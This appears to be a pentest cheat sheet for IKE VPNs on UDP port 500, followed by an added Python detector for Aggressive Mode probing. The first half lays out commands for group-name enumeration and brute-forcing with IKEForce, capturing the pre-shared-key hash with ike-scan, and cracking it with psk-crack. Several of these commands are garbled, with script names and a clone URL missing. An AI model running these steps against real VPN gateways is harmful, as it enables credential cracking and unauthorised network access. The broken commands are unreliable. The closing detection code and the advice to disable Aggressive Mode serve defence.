500 - IKE

IKE is part of the IPsec protocol suite, which is used by VPNs. It uses UDP port 500.


Use IKEForce to enumerate or dictionary attack VPN servers.
pip install pyip
git clone
Perform IKE VPN enumeration with IKEForce:
./ TARGET-IP -e -w wordlists/groupnames.dic
Bruteforce IKE VPN using IKEForce:
./ TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1


ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
IKE Aggressive Mode PSK Cracking
  1. Identify VPN Servers
  2. Enumerate with IKEForce to obtain the group ID
  3. Use ike-scan to capture the PSK hash from the IKE endpoint
  4. Use psk-crack to crack the hash
Step 1: Identify IKE Servers (uses
./ -p ike SUBNET/24
Step 2: Enumerate group name with IKEForce
./ TARGET-IP -e -w wordlists/groupnames.dic
Step 3: Use ike-scan to capture the PSK hash
ike-scan -M -A -n example_group -P hash-file.txt TARGET-IP
Step 4: Use psk-crack to crack the PSK hash
psk-crack hash-file.txt
Some more advanced psk-crack options below:
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
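
Detection side of the steps above: group-name enumeration and hash capture both appear on the wire as repeated IKEv1 Aggressive Mode first messages on UDP 500. The Python below is an added example, not from the original page or from the IKEForce or ike-scan projects; it parses the ISAKMP header (RFC 2408) and lists sources that send many such messages. The function names, the threshold and the sample datagrams are assumptions constructed for illustration.

```python
import struct
from collections import Counter

# ISAKMP header, RFC 2408 section 3.1 (28 bytes): initiator cookie, responder
# cookie, next payload, version, exchange type, flags, message ID, length.
ISAKMP_HDR = struct.Struct("!8s8sBBBBII")
EXCHANGE_NAMES = {2: "main", 4: "aggressive", 5: "informational", 32: "quick"}
ZERO_COOKIE = b"\x00" * 8


def parse_isakmp(payload):
    """Return header fields of a UDP/500 payload, or None if it is not plausible ISAKMP."""
    if len(payload) < ISAKMP_HDR.size:
        return None
    icookie, rcookie, _np, version, exch, _flags, _msgid, length = ISAKMP_HDR.unpack_from(payload)
    if length < ISAKMP_HDR.size or icookie == ZERO_COOKIE:
        return None
    return {
        "major": version >> 4,                      # 1 = IKEv1, 2 = IKEv2
        "exchange": EXCHANGE_NAMES.get(exch, str(exch)),
        "initial": rcookie == ZERO_COOKIE,          # first message of a new negotiation
    }


def aggressive_initiators(datagrams, threshold=3):
    """Count IKEv1 Aggressive Mode first messages per source; return sources at or above threshold."""
    counts = Counter()
    for src, payload in datagrams:
        hdr = parse_isakmp(payload)
        if hdr and hdr["major"] == 1 and hdr["exchange"] == "aggressive" and hdr["initial"]:
            counts[src] += 1
    return {src: n for src, n in counts.items() if n >= threshold}


def _sample(exch, n):
    # Constructed header only (no payloads): non-zero initiator cookie, zero responder cookie, IKEv1.
    return ISAKMP_HDR.pack(bytes([n + 1]) * 8, ZERO_COOKIE, 1, 0x10, exch, 0, 0, ISAKMP_HDR.size)


# Constructed sample traffic using documentation addresses (RFC 5737).
SAMPLE = [("198.51.100.7", _sample(4, i)) for i in range(5)] + [
    ("192.0.2.10", _sample(2, 9)),    # ordinary Main Mode client
    ("192.0.2.11", _sample(4, 10)),   # single Aggressive Mode attempt
    ("192.0.2.12", b"\x00" * 10),     # too short to be ISAKMP, ignored
]

if __name__ == "__main__":
    print(aggressive_initiators(SAMPLE))
```

On a gateway that only needs Main Mode or IKEv2, any hit from this check is worth investigating, and disabling Aggressive Mode removes the hash exposure that step 3 relies on.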